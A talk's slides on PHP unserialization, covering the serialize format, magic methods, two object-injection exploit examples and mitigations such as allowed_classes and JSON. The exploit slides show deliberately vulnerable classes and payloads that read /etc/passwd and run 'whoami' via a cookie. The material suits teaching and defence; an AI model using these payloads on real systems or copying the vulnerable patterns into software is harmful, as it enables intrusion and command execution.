A Closer Look Into PHP Unserialization
S Ashwin Shenoi
php > system("whoami");
● S Ashwin Shenoi (@c3rb3ru5)
● 2nd year BTech CSE @ Amrita School of Engineering,
Amritapuri
● CTF Player @teambi0s
● Web Exploitation
● Organising team @InCTF and InCTFj
● Twitter: @__c3rb3ru5__
php > echo "Agenda";
● PHP Classes and Objects
● Serialization and unserialization
● What are magic functions
● Vulnerabilities of unserialize() function
● Exploiting unserialize()
● Mitigation
php > echo "PHP Classes";
● A programmer-defined data structure which consists of local data
(attributes or properties) as well as local functions (methods).
class Test {
public $name;
public $age;
public function __construct( ) {
$this->name = "Ashwin";
$this->age = 19;
}
}
php > echo "PHP Objects";
● An object is a data type which stores data and
information on how to process that data.
● An Object is an individual instance of the data
structure defined by a class.
● We define a class once and then make many objects that
belong to it.
$person = new Test( );
php > echo "What is serialization";
● Converting a complex data structure such
as a class object or arrays into strings.
● Easier for transmission and storage.
● Stored representation of an object.
● Example Scenarios:
○ Passing objects via URL Query parameters or cookies.
○ Storing object data in text or in a single database
field
■ serialize( ) the object to a string
■ Store the object into the database or text
■ unserialize( ) the stored string back to a PHP Object
php > serialization();
● Double
○ d:<value>;
○ d:12.1234;
● NULL
○ N;
● Integers
○ i:<value>;
○ i:100;
○ i:-200;
● Boolean
○ b:<value>;
○ b:1; // TRUE
○ b:0; // FALSE
● Strings
○ s:<length>:"<value>";
○ s:6:"Ashwin";
● Arrays
○ a:<length>:{<key>;<value>;}
○ a:2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;}
■ // array( "name" => "Ashwin" , "age" => 19 );
php > $a = 5;
php > var_dump($a);
int(5)
php > echo serialize($a);
i:5;
php > $b = unserialize('i:5;');
php > echo $b;
5
php > var_dump($b);
int(5)
php > $c = "Ashwin";
php > var_dump($c);
string(6) "Ashwin"
php > echo serialize($c);
s:6:"Ashwin";
php > $d = unserialize('s:6:"Ashwin";');
php > echo $d;
Ashwin
php > var_dump($d);
string(6) "Ashwin"
php > serialization();
O:<class name length>:"<class name>":<number of properties>:{ <properties> };
O:4:"Test":2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;}
object(Test)#1 (2) {
["name"]=>
string(6) "Ashwin"
["age"]=>
int(19)
}
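The serialization grammar above, exercised end to end. This is an added example, not code from the slides: it round-trips the deck's Test class and each scalar form through serialize()/unserialize(), and then shows what happens when a length prefix does not match its payload. The "héllo" string is a constructed input chosen to show that the s: prefix is a byte count. Expected output is given in the comments and assumes PHP 7.1 or later (serialize_precision = -1).

```php
<?php
// Added example (not from the slides): serialize()/unserialize() round trip of
// the Test class from the deck, plus the scalar and array forms.

class Test {
    public $name;
    public $age;
    public function __construct() {
        $this->name = "Ashwin";
        $this->age  = 19;
    }
}

$person = new Test();
$blob = serialize($person);
echo $blob, "\n";
// O:4:"Test":2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;}

// Scalars and arrays use the same grammar: type letter, optional length, value.
echo serialize(12.1234), "\n";   // d:12.1234;
echo serialize(null), "\n";      // N;
echo serialize(-200), "\n";      // i:-200;
echo serialize(true), "\n";      // b:1;
echo serialize(["name" => "Ashwin", "age" => 19]), "\n";
// a:2:{s:4:"name";s:6:"Ashwin";s:3:"age";i:19;}

// The length prefix of s: is a byte count, not a character count
// ("é" is two bytes in UTF-8, so the string is 6 bytes long).
echo serialize("héllo"), "\n";   // s:6:"héllo";

// unserialize() rebuilds an object of the named class with the stored values.
$copy = unserialize($blob);
var_dump($copy instanceof Test);  // bool(true)
var_dump($copy->name);            // string(6) "Ashwin"
var_dump($copy->age);             // int(19)

// A length that does not match its payload makes the parser fail:
// unserialize() returns false and raises a notice naming the bad offset
// (suppressed here with @ so only the return value is shown).
var_dump(@unserialize('s:5:"Ashwin";'));   // bool(false)
```

Because every string carries its own length and every object carries its class name and property count, the format can be hand-written without any PHP code involved; that is what makes the later payloads in this deck possible.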
php > echo "__Magic_Methods( )";
● Reserved methods whose names start with "__".
● Magic methods are named after the specific action that leads
to their execution.
● All magic methods MUST be declared as public.
● Automatically called, so they need not be explicitly called or
invoked.
● Some magic methods (for example __wakeup( ) and __destruct( )) run
automatically on an object that unserialize( ) has reconstructed.
__sleep( )
__wakeup( )
__toString( )
__invoke( )
__set_state( )
__clone( )
__debugInfo( )
__construct( )
__destruct( )
__call( )
__callStatic( )
__get( )
__set( )
__isset( )
__unset( )
● __construct( )
○ Normally used to initialise data in variables.
○ First method called after object creation.
○ If you do not explicitly declare it, then there will be a
default constructor with no parameters and empty content in
the class.
● __destruct( )
○ Performs some operations before an object is destroyed, such as
closing a file.
○ Called as soon as there are no other references to a
particular object, or in any order during the shutdown
sequence.
○ Unlike the constructor the destructor cannot have any
parameters.
● __wakeup( )
○ Called by unserialize( ) as soon as the object has been reconstructed,
before it is returned to the caller; the constructor is not run.
○ Often used to rebuild database connections, or perform other
initialization operations.
○ This is roughly the opposite of the __sleep( ) magic method, which
is automatically called when serialize( ) is invoked.
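The lifecycle described in the three bullets above, made observable. This is an added example, not code from the slides: the Session class, its property names and the "live-db-handle" value are constructed for illustration, and each magic method prints its own name so the order of calls across serialize(), unserialize() and object destruction can be read off the output.

```php
<?php
// Added example (not from the slides): a class that reports which magic
// methods fire during serialize()/unserialize(). Names are illustrative.

class Session {
    public $user = "ashwin";
    public $conn = "live-db-handle";   // stand-in for a resource that cannot be serialized

    public function __construct() { echo "__construct\n"; }

    // Called by serialize(): returns the NAMES of the properties to store.
    public function __sleep() {
        echo "__sleep\n";
        return ["user"];               // drop $conn; __wakeup() rebuilds it
    }

    // Called by unserialize() once the object exists, before it is returned.
    public function __wakeup() {
        echo "__wakeup\n";
        $this->conn = "reconnected";
    }

    // Called when the last reference disappears, or during shutdown.
    public function __destruct() { echo "__destruct (user={$this->user})\n"; }
}

$s = new Session();                    // prints: __construct
$blob = serialize($s);                 // prints: __sleep
echo $blob, "\n";                      // O:7:"Session":1:{s:4:"user";s:6:"ashwin";}

// The constructor is NOT called here: property values come straight from
// the string, and only __wakeup() gets a chance to look at them.
$copy = unserialize($blob);            // prints: __wakeup
var_dump($copy->conn);                 // string(11) "reconnected"

unset($copy);                          // prints: __destruct (user=ashwin)
// $s is destroyed at script shutdown, printing __destruct (user=ashwin) once more.
```

The security-relevant observation is the skipped constructor: whatever validation __construct( ) performs never sees the values that arrive through unserialize( ), so __wakeup( ) and __destruct( ) operate on data the caller of unserialize( ) chose.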
So how on earth is this vulnerable?
php > echo "Vulnerability";
● The unserialize( ) function is SECURE IF THE USER CANNOT
INFLUENCE THE INPUT.
● In order to successfully exploit an unserialize bug, two
conditions HAVE to be satisfied:
○ A PHP magic method (e.g. __destruct or __wakeup) that contains
code an attacker can abuse, or that can start a POP
(property-oriented programming) chain.
○ All classes used for the attack must be declared and imported
by the time of unserialization, or the application must support
class autoloading.
php > echo "Exploit 1";
class Example1 {
public $file;
public function __construct( ) {
// Random PHP Code
}
public function __destruct( ) {
if ( file_exists ( $this->file ) ) {
include ( $this->file );
}
}
}
…..
// Random PHP Code
$data = unserialize($_GET['input']);
// Random PHP Code
…..
http://example.com/?input=O:8:"Example1":1:{s:4:"file";s:11:"/etc/passwd";}
php > echo "Exploit 2";
class Example2 {
public $cmd;
public function __construct( ) {
// Random PHP Code
}
public function __wakeup( ) {
if ( isset ( $this->cmd ) ) {
system ( $this->cmd );
}
}
}
…..
// Random PHP Code
$data = unserialize($_COOKIE['input']);
// Random PHP Code
…..
GET / HTTP/1.1
Host: example.com
Cookie: input=O:8:"Example2":1:{s:3:"cmd";s:6:"whoami";}
Let’s get to a demo
php > echo "Mitigation";
● PHP 7 added an additional parameter, "options", to the
unserialize( ) function. With allowed_classes set to false, every
object in the input is rebuilt as __PHP_Incomplete_Class, so no
application class's magic methods run.
○ unserialize($str, ['allowed_classes' => false]);
● Never use the unserialize( ) function on user-controllable input.
● Instead use the JSON format, which carries data only and never
names a class to instantiate.
○ json_encode( )
○ json_decode( )
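The mitigations above applied to the deck's Example2 pattern. This is an added example, not code from the slides: the class keeps the deck's name and property, but the system( ) call is replaced by a static counter so the demonstration only records whether __wakeup( ) ran. The payload is the one shown on the Exploit 2 slide; the 'Test' entry in the allow-list is an assumed name standing in for whatever classes an application genuinely expects.

```php
<?php
// Added example (not from the slides): the Exploit 2 class with the side
// effect replaced by a counter, run through unserialize() with and without
// the allowed_classes option, followed by the JSON alternative.

class Example2 {
    public $cmd;
    public static $woken = 0;          // counts __wakeup() calls instead of running system()

    public function __wakeup() {
        if (isset($this->cmd)) {
            self::$woken++;
        }
    }
}

// The cookie value from the Exploit 2 slide, used here as the untrusted input.
$payload = 'O:8:"Example2":1:{s:3:"cmd";s:6:"whoami";}';

// 1. Bare unserialize(): the object is rebuilt and __wakeup() runs on attacker data.
$obj = unserialize($payload);
var_dump(get_class($obj));         // string(8) "Example2"
var_dump(Example2::$woken);        // int(1)

// 2. allowed_classes => false: the result is a __PHP_Incomplete_Class whose
//    properties are preserved but whose original class's methods never run.
$obj = unserialize($payload, ['allowed_classes' => false]);
var_dump(get_class($obj));         // string(22) "__PHP_Incomplete_Class"
var_dump(Example2::$woken);        // int(1)   (unchanged: __wakeup() did not fire)

// An explicit allow-list behaves the same for any class not on it.
// 'Test' is an assumed name for a class the application actually expects.
$obj = unserialize($payload, ['allowed_classes' => ['Test']]);
var_dump($obj instanceof __PHP_Incomplete_Class);   // bool(true)
var_dump(Example2::$woken);                         // int(1)

// 3. JSON carries data only; no class name means nothing gets instantiated.
$json = json_encode(['cmd' => 'whoami']);
$data = json_decode($json, true);
var_dump($data);                   // array(1) { ["cmd"]=> string(6) "whoami" }
```

Treat allowed_classes as defence in depth rather than a substitute for the second bullet: a __PHP_Incomplete_Class still carries the attacker's property values, and any allow-listed class remains reachable, so the input is still untrusted after the call.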
Questions?
